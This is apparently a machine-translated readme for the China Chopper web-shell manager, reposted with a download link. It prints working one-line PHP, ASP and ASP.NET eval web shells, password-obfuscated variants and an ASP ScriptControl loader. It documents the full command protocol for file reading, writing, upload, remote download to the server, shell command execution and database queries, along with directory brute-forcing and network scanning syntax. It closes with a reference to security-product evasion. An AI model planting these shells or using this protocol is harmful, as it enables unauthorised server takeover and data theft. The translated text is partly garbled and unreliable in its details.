Download please look for the official website: http://www.maicaidao.com/
But now the official has not opened, a lot of friends can not find, so now put out, have the need for friends to download their own!
: http://pan.baidu.com/s/1gfuoU4b
Software Introduction:
Software name: Chinese kitchen knife (China chopper)
Official website: http://www.maicaidao.com/
———————————————————————————————————-
Disclaimer:
Please pay attention to the use of the environment and comply with national laws and regulations!
Due to improper use of the consequences of the factory does not assume any responsibility!
———————————————————————————————————-
Procedures in the use of the process will inevitably have a variety of bugs, to the official website to see if there is an update it, perhaps it has been repaired.
———————————————————————————————————-
Uincode mode compilation, support multi-language input display.
In the non-Simplified Chinese environment, the automatic change into the English interface, the translation of the wrong place please leave a message.
I. Script client (including but not limited to the Eval) Section
1) basic information
Eval server only need a simple line of code, you can use this program to implement common management functions, function code two times after encoding sent, the ability of the IDs greatly improved.
currently supported server-side scripts: PHP, ASP, ASP, and Web sites that support HTTPS secure connections. The
code running on the server is as follows:
PHP: <?php @eval ($_post[' Chopper '));?
asp: <%eval request ("Chopper")%>
asp: <%@ page language= "Jscript"%><%eval ( Request.item["Chopper"], "unsafe");%>
(note: ASP. NET to a single file or this file is also a JScript script)
Customize: Custom type, the function code is saved on the server, theoretically supports all dynamic scripts, as long as the correct interaction with the chopper.
This mode can be customized on demand, such as simply browsing the directory, or as long as the virtual terminal function, the code can be very brief.
Connection password with date, service-side notation:
asp:
<%@ page language= "Jscript"%><%eval (request.item[ FormsAuthentication.HashPasswordForStoringInConfigFile (String.Format ("{0:YYYYMMDD}", DateTime.Now.ToUniversalTime ()) + "37e4dd20c310142564fc483db1132f36″," Md5″). ToUpper ()], "unsafe");%>
PHP:
@eval ($_post[strtoupper (MD5 (gmdate ("YMD"). " 37e4dd20c310142564fc483db1132f36″)]);
For example: the password for the chopper is chopper, three characters in front, the new password is: {d}chopper
2) Several functions
right/Add in the main view, enter the server-side address in the popup dialog, connect the password (note the pass string in the above example), Choose the correct script type and language encoding,
after saving can use file management, virtual terminal, database management, self-written script a few chunks of functionality.
1. File management: [featured] Cache download directory, and Support offline view cache directory;
2. Virtual Terminal: [Features] humanized design, easy to operate; (enter help to see more usage), the extra-long command is split into 5k bytes and submitted separately.
3. Database management: [featured] graphical interfaces, support for mysql,mssql,oracle,infomix,access, and databases that support ADO-mode connections.
If you are proficient in SQL syntax, why phpmyadmin it? Moreover, the chopper also supports the database management of any script.
(for database connection methods under various scripting conditions, click the Configure button in the top left corner of the database management interface)
4. Self-scripting: by simply encoding the user's own script to the server execution, to achieve rich functionality, but also choose to send to the browser execution.
If you want to write your own CCC script, you can refer to the CCC directory of the sample code, I believe you can also write a feature-rich script. The
can download someone else's CCC script on the website, or share your pride.
Note: Some features may not work properly due to server security settings.
3) configuration information fill in the instructions
—————————————————————————————
A) Database aspects:
—————————————————————————–
PHP Script:
<T> type </T> type can be one of the Mysql,mssql,oracle,infomix,postgresql
<H> Host address <H> host address can be a machine name or IP address, such as localhost
<U> database user </U> user name to connect to the database, such as root
<P> Database Password </P> connection database password, such as 123455
<N> Default Library </N> library name of the default connection
<L>utf8</L> This database type is optional when MySQL script is PHP, Latin1 is not required
ASP and ASP. NET Script:
<T> type </T> type can only fill ADO
<c>ado configuration Information </C>
ADO connects various databases in different ways. If the configuration information for MSSQL is
Driver={sql Server}; server= (local);D atabase=master; Uid=sa; pwd=123456;
At the same time, support NT Authentication login MSSQL database, and can export the query result list as HTML file
Customize script:
<T> type </T> type can only be filled xdb
<X> configuration information with customize script conventions </X>
The customize.jsp database parameter filling method with the kitchen knife is as follows (two lines):
MSSQL:
<X>
Com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databasename=test;user=sa;password=123456
</X>
Mysql:
<X>
Com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
Oracle.jdbc.driver.OracleDriver
Jdbc:oracle:thin:user/[email Protected]:1521/test
</X>
B) Other aspects:
—————————————————————————–
Add additional data for additional submissions, such as the new server for ASP:
<%
Set o = Server.CreateObject ("ScriptControl")
O.language = "VBScript"
O.addcode (Request ("SC"))
O.run "FF", Server,response,request,application,session,error
%>
Well, the chopper is filled in at the configuration:
<O>SC=FUNCTION+FF (Server,response,request,application,session,error): eval (Request ("Pass")): End+function </O>
Then use the password pass to connect.
Post an additional packet before the feature is submitted: only once during the session.
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
Example of default terminal program path setting:
<SHELL>/bin/sh</SHELL>
Examples of virtual terminal default command settings:
<CMD>whoami</CMD>
Example of directory settings open by default for file management:
<CD>c:\windows\temp\</CD>
3) HTTP Login Verification
Shell address so fill http://user:[email protected]/server.asp
Special characters in the user name password can be converted using URL encoding.
4) Data import: In the Shell list interface, right-click on a menu, you can import other chopper library into the current classification.
Second, security scan
Spider crawling, binding domain name query, catalog blasting.
Command explanation:
A) Check the binding domain name of the single IP
{REVERSE_IP} {url:http://www.maicaidao.com/}
B) Scan this C-segment open Web server and query the bound domain name
{Reverse_ip_c} {url:http://www.maicaidao.com/}
c) scan only open Web servers in this section C
{Reverse_ip_c} {url:http://www.maicaidao.com/} {Port}
D) Spider crawling
{Spider} {url:http://www.maicaidao.com/}
E) Spiders crawl and set the crawl range
{Spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) Spiders crawl, filter duplicate URLs to speed up
Plus {filter}
G) burst function,%s is a row in Dict
Flag: followed by specific keywords in the returned data (with HTTP headers)
Add!! True if the keyword is not included, otherwise contains the keyword true
List.txt is the file under the current directory and can be set to an absolute path, note: Do not include too many rows.
Note: Starting with version 20100626, list.txt must be a Unicode-formatted text file
{Crack} {url:http://%s/admin/} {flag:http/1.1 200} {Dict:list.txt}
{Crack} {url:http://%s/admin/} {flag:!! http/1.1 404} {Dict:list.txt}
{Crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {Dict:list.txt}
Third, timing reminders
When the alarm clock comes in, Cycle: monthly/weekly/daily/only once.
Iv. Browser
is a dedicated web browser: Post Browse/Custom cookies,/Execute custom script/Auto Refresh page/search with IP Web page.
If there is a Ip.dat library, the status bar will show the IP of this website, country code.
V. Other PARTS
Waiting to join.
——————————————–
20110628 Update Considerations
Cache libraries It's best to rebuild.
——————————————–
File Description:
——————————————————————
Chopper.exe Chopper Program
master database of Db.mdb Chopper
——————————————————————
CACHE.TMP Chopper Cache Database (can be deleted)
Readme.txt What you are looking at now (can be deleted)
<CCC> Chopper's self-writing script (can be deleted)
<Customize> Customize Mode service side (can be deleted)
Customize.aspx This is a sample server for C # service (full-featured)
Customize.jsp This is an example of a JSP server (full-featured)
Customize.cfm This is a CFM sample server (file management, virtual terminal)
--with ————————— Customize mode Chopper and service-side communication interface ————————————————————— –
The service-side code ———————————-other languages can be written on this interface (see CUSTOMIZE.JSP/CUSTOMIZE.CFM) ———————
Example: Kitchen knife client Fill in the password is pass, the page encoding is selected GB2312 (JSP service side will use this parameter)
Note: All parameters are submitted as post, and the returned data is marked with->| as the start tag and |<-as the closing tag.
Note: The error message returned starts with error://
Note: \ t represents tab tab,\r\n for newline carriage return, \ n for carriage return
Note: The database configuration information is a string that the server-side script can customize for this string format.
———————————————————————————————————————————–
[Get the absolute path of the current directory]
Submitted by: pass=a&z0=gb2312
Return: The absolute path of the directory \ T, if it is followed by a Windows system followed by a list of drives
Example: c:\inetpub\wwwroot\ c:d:e:k:
Example:/var/www/html/
[Directory Browse]
Commit: pass=b&z0=gb2312&z1= Directory absolute path
Return: First directory after the file, directory name to add/, after the file name do not add/
Example:
Directory name/\t time \ t size \ t property \ n Directory name/\t time \ t size \ t property \ n
File name \ t time \ t size \ t property \ n filename \ t time \ t size \ t property \ n
[Read text file]
Commit: pass=c&z0=gb2312&z1= file absolute path
Return: The contents of a text file
[Write to text file]
Submitted by: pass=d&z0=gb2312&z1= file Absolute path &z2= file contents
Returned: Successfully returned 1, unsuccessful return error message
[Delete files or directories]
Commit: The absolute path to the pass=e&z0=gb2312&z1= file or directory
Returned: Successfully returned 1, unsuccessful return error message
[Download file]
Commit: Absolute path to the pass=f&z0=gb2312&z1= server file
Back: To download the contents of a file
[Upload file]
Submission: pass=g&z0=gb2312&z1= File upload absolute path &z2= file contents (hexadecimal text format)
Back: To download the contents of a file
[Paste after copying files or directories]
Commit: pass=h&z0=gb2312&z1= copy absolute path &z2= paste Absolute path
Returned: Successfully returned 1, unsuccessful return error message
[File or directory rename]
Submitted by: pass=i&z0=gb2312&z1= (absolute path) &z2= new name (absolute path)
Returned: Successfully returned 1, unsuccessful return error message
[New Catalog]
Commit: pass=j&z0=gb2312&z1= new directory Name (absolute path)
Returned: Successfully returned 1, unsuccessful return error message
[Modify file or directory time]
Commit: pass=k&z0=gb2312&z1= The absolute path of the file or directory &z2= time (format: Yyyy-mm-dd HH:mm:ss)
Returned: Successfully returned 1, unsuccessful return error message
[download file to server]
Commit: Pass=l&z0=gb2312&z1=url path &z2= The absolute path saved after download
Returned: Successfully returned 1, unsuccessful return error message
[Execute Shell command (before the shell path is based on the server system type Plus-C or/C parameter)]
Submit: Pass=m&z0=gb2312&z1= (-C or/C) plus Shell path &z2=shell command
Return: Command execution result
[Get basic information about the database]
Submit: pass=n&z0=gb2312&z1= Database configuration information
Returned: Successfully returned database (tab \ t delimited), error message not successfully returned
[Get database table name]
Submit: pass=o&z0=gb2312&z1= database configuration information \ r \ n Database name
Return: Successful return data table (\ t delimited), error message not successfully returned
[Get Data table column name]
Submit: pass=p&z0=gb2312&z1= database configuration information \ r \ n database name \ r \ n data table name
Return: Successful Return data column (tab \ t delimited), failed to return error message
[Execute Database command]
Submit: pass=q&z0=gb2312&z1= database configuration information \ r \ n Database name &z2=sql command
Return: Successful return of data table contents, error message not successfully returned
Note: The first behavior of the header is returned, followed by each row in the list, and the number of columns is required to be consistent. Each column in the row is followed by a \t|\t tag, with each line marked \ r \ n to end
========================
Security Risk Control
Chinese red chopper to go back door (over dog)